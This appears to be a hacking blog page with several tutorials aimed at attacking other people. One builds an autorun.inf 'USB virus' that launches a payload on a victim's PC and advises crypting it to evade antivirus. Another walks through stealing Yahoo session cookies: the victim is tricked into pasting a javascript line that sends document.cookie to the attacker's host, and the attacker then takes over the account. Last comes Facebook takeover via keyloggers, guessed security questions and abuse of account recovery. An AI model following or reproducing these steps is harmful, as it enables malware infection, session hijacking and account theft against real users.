• Keep Visiting for more updates. . .

Featured articles

Methods Of Attack Read More ...

Phishing Read More ...

Session Hijacking Read More ...

  Today am going to show you a very easy technique to make a usb virus.Its quite simple.
Plug in your usb,open the usb drive from computer.Right click on it and then goto New =>Text document.Save it as autorun.inf.And then this file opens in a notepad,open it and type in
[autorun]
open  = yourserver.exe
action= theaction
label  = indiantechnogeek
icon   = youricon.ico

and save the file.
To mention what these commands do
[autorun]-this command starts as soon as autorun is hit when the flash drive is inserted.
open- The file mentioned here is opened
action- Action is what we display on the autorun menu.Well you can name it anything.
label-Label is the name of the flash drive
icon- This will change the icon of the flash drive.

Well note that the server.exe and the icon.ico files need to be copied to the flash drive before plugging into the victims computer.And the server need to be crypted with a fud crypter so that antivirus doesnt detect it.
So,here you go.You have your usb virus ready.

   In this article am going to tell you about the most common and sophisticated attacks used by the hackers .There are three types of attacks that are being most commonly used:

1.Brute Force Attack: The Brute Force Attack comes under the cryptography technique in which a key is being extracted from an encrypted data.In this attack hackers try every possible code,combination or password until the correct one is found.This is a more comprehensive technique since each and every key  is to be checked until the correct key is being found.The time taken by these algorithms depends on the strength of the code.If the code is too small then it may get cracked early but if its too long it takes a lot of time and higher processor speed  to break the code.Sometimes they may take even a week to find the code.

2.Dictionary Attack: A Dictionary attack is a much simpler and faster technique to break into a machine.In this technique a text file which includes all the dictionary words(Dictionary file) is being loaded in to the cracking application and this application is run against the users accounts.Since most of the passwords are simplistic therefore the code gets cracked.

3.Hybrid Attack: Another well known attack is the Hybrid attack.In this attack a cracker uses the users file names and inserts numbers and symbols after them to find the passes.Generally people change their passwords using only a few numbers difference.If the pass for the first month is STG1,then the pass for the second month may be STG2 and so on.So,these kinds of patterns are being used in the algorithms to crack the password.
    





       In this article am going to show you people how to hack yahoo accounts.You might have heard about cookies.
   When we sign into an account,it generates a unique string.One copy of that is placed in the server and the other one in your browser as a cookie.Both the copies are being compared and matched everytime we do something in our account.This allows you to browse many pages at a time without giving any authentication every time.This unique string is destroyed whenever we log out of our account.


 just visit yahoo.com and type




Javascript:alert(document.cookie);




in you address bar
you ll get a pop up showing the cookies.and then do the same thing after logging into your yahoo.You can see some more elements are being added.That means that a session is stored in your browser.


Now the attacker can steal these cookies by convincing the victim to run a piece of code in the browser.Attacker can use the stolen session to access the victims account without entering any id or password.
Am going to explain the step by step procedure to do this.


Step1:Download the following files and extract them.
http://www.ziddu.com/download/16215811/yahoocookiestealerbyindiantechnogeek.rar.html




Step2:You ll have four files in it.upload the 4 files into the file manager of your free webhosting account.You can create a webhosting account from these sites
http://www.freehostia.com/
http://www.my3gb.com/
etc.there are many free webhosting sites.Google them.
Here yahoo.php is the cookie stealing script and hacked.php executes the stolen cookies in the browser.
Now create a new directory named cookies in your account.Stolen cookies get stored in the directory cookies.


Step3:Now you got to convince the victim to paste this code in his/her browser.


code: "javascript:document.location='http://yourdomain.com/yahoo.php?ex '.concat(escape(document.cookie));
The victim would again get redirected to yahoo.com


Step4:Now open hacked.php in your webhosting account
your url would be http://yourdomain.com/hacked.php


default password is indiantechnogeek




Now you must have got the user name of the slaves account in hacked.php.Once you click on it you get logged into his account.This will be permanently stored.you need not type the id and password again.


       Any queries regarding this please leave a comment. :)

There are other simple hacks for Facebook.Some of them are




1. Key loggers: 
        
    Key loggers are a useful tool in hacking not only Facebook but in almost all hacking tricks .The key loggers once installed on a system trace every key stroke of the computer.It runs in the background and sometimes its processes are being hidden in the task manager too.The most interesting part of it is that it  combines with the spyware allowing your info to be transmitted to an unknown  person without your knowledge.Some of the Key loggers store only the screens where as a few automatically on your video or audio recorders and transmit what they capture over your internet connection.
  a. Hardware Key loggers:
  These are physical devices which are being attached to a computer connected between the computer and the CPU.


 b.Software Key loggers:
  These are the softwares which work in the background as explained earlier.As many of you know about these. there's not much to explain..






2.Hacking Facebook email address: 
    I guess most of you have never got an idea about this.The most simple way  of hacking an account is by clicking on the forgot password and answering the security question.Generally the security questions are very easy and simple ones about the user.




3.Facebook's recovery option: 
     There is a recovery option in Facebook.here you can mention that even your  primary accounts are being hacked and you don't have any access to them.Then you ll be asked many personal questions about the user.If you know the user well then you can easily answer those questions.After that it asks you to enter an email for password recovery.then you can give an email which you can access.As simple as that. .:)



    Hope this might be helpful.Any queries,leave a comment.Will assist asap. .